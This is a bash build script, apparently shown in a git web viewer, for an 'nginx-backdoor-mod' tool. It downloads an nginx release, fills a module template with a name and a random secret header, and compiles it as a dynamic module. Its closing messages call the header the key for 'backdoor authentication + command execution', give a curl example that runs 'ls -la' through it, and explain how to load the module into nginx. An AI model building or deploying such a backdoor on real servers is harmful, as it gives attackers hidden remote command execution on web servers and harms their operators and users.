blob: 1e8ec52d9e635b783aed3061aec717a4c017457e (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
|
#!/bin/bash
function usage() {
printf "%s\n" \
"usage: $(basename $0) [-l] [-r -n]" \
"" \
"-l list nginx releases" \
"-r choose release" \
"-n set name for the built nginx module" \
"-h print this help message and exit"
exit 1
}
while getopts "lr:n:h" opts; do
case $opts in
l)
releases=$(curl -sSL https://nginx.org/download/ | grep -Eoi '"nginx-[0-9\.]+.tar.gz"' | tr -d '"' | sort -u)
printf "%s\n" "[inf] releases provided by nginx.org"
for i in $releases; do
printf "%s\n" "${i}"
done
exit 1
;;
r) release="${OPTARG}";;
n) name="${OPTARG}";;
h) usage;;
*) usage;;
esac
done
header="X-$(tr -dc 'a-f0-9' < /dev/urandom | head -c32)"
if test -n "${name}"; then
sed -i "s/__MODULENAME__/${name}/g" /root/ngx_mod_template/config
sed -i "s/__NAME__/${name}/g" /root/ngx_mod_template/ngx_mod_template.c
sed -i "s/__HEADER__/${header}/g" /root/ngx_mod_template/ngx_mod_template.c
cp /root/ngx_mod_template/ngx_mod_template.c "/root/ngx_mod_template/${name}.c"
else
usage
fi
if test -n "${release}"; then
download_url="https://nginx.org/download/${release}"
version=$(printf "%s\n" "${release}" | grep -Eo "([0-9]+\.[0-9]+\.[0-9]+)")
logfile="/root/nginx-backdoor-mod/build_${version}.log"
dir_name="/root/nginx-backdoor-mod"
if [[ $(curl -o /dev/null -s -w "%{http_code}" "${download_url}") != "404" ]]; then
printf "%s\n" "[inf] downloading ${download_url}"
mkdir -p "${dir_name}" &>/dev/null
(
cd "${dir_name}"
curl -sSL "${download_url}" -OJ
printf "%s\n" "[inf] extracting ${release} to ${dir_name}"
tar xf "${release}"
)
fi
(
cd "${dir_name}/nginx-${version}"
if test -f configure; then
if ./configure --add-dynamic-module=/root/ngx_mod_template/ --with-compat 2>&1 >$logfile; then
printf "%s\n" "[inf] configure successful"
else
printf "%s\n" "[wrn] skipping \"--with-compat\" for configure"
if ./configure --add-dynamic-module=/root/ngx_mod_template/ 2>&1 >$logfile; then
printf "%s\n" "[inf] configure successful"
fi
fi
else
printf "%s\n" "[err] \"configure\" not found"
exit 1
fi
if make modules CFLAGS="-Wno-unused-result" 2>&1 >$logfile; then
printf "%s\n" "[inf] successfully built ${name}.so"
else
if make CFLAGS="-Wno-unused-result" 2>&1 >$logfile; then
printf "%s\n" "[inf] successfully built ${name}.so"
fi
printf "%s\n" "[err] failed to build ${name}.so"
fi
)
if test -f "${dir_name}/nginx-${version}/objs/${name}.so"; then
cp "${dir_name}/nginx-${version}/objs/${name}.so" "${dir_name}/${name}_v${version}_${header}.so"
printf "%s\n" \
"" \
"[inf] output module \"${dir_name}/${name}_v${version}_${header}.so\"" \
"[inf] use \"${header}\" for backdoor authentication + command execution" \
"[inf] example: curl http://localhost -H '${header}: ls -la'" \
"[inf] enable with nginx module config in /etc/nginx/modules-enabled and \"load_module /path/to/${name}.so;\"" \
"[inf] enable with the main nginx config in /etc/nginx/nginx.conf and \"load_module /path/to/${name}.so;\""
else
printf "%s\n" "[err] module not found at \"${dir_name}/nginx-*/objs/${name}.so\", this should not happen"
fi
else
usage
fi
|